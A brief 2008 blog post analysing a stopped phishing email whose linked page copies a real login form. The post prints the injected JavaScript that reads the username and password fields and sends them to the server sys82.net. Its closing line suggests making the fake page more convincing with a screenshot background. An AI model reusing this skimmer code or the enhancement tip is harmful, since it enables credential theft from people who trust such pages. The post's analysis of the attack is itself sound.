Nifty Phishing Approach
*** Scam was stopped ***
This phishing attempt was delivered through email, with the above link - claiming maintenance was scheduled. Has some nice text, doesn’t tell you to login, but provides a link so you can. :)
It looks great.
The code below is the phishing code, it catches the login validation and sends it to the sys82.net server, where it can capture your data.
var script = document.createElement('script');
script.type = 'text/javascript';
script.src = 'http://sys82.net/index.php?loh=1&login=' + document.getElementById('loginid').value + '&password=' + document.getElementById('password').value;
document.body.appendChild(script);
return false;
The page content is probably copied live from the real site, with the javascript added in by the phishermen.
Page is slow. Would be good to take a screenshot and use that as a background while the real page loads. :yes:
Print article | This entry was posted by elvis on 10/27/08 at 05:50:14 pm . Follow any responses to this post through RSS 2.0. |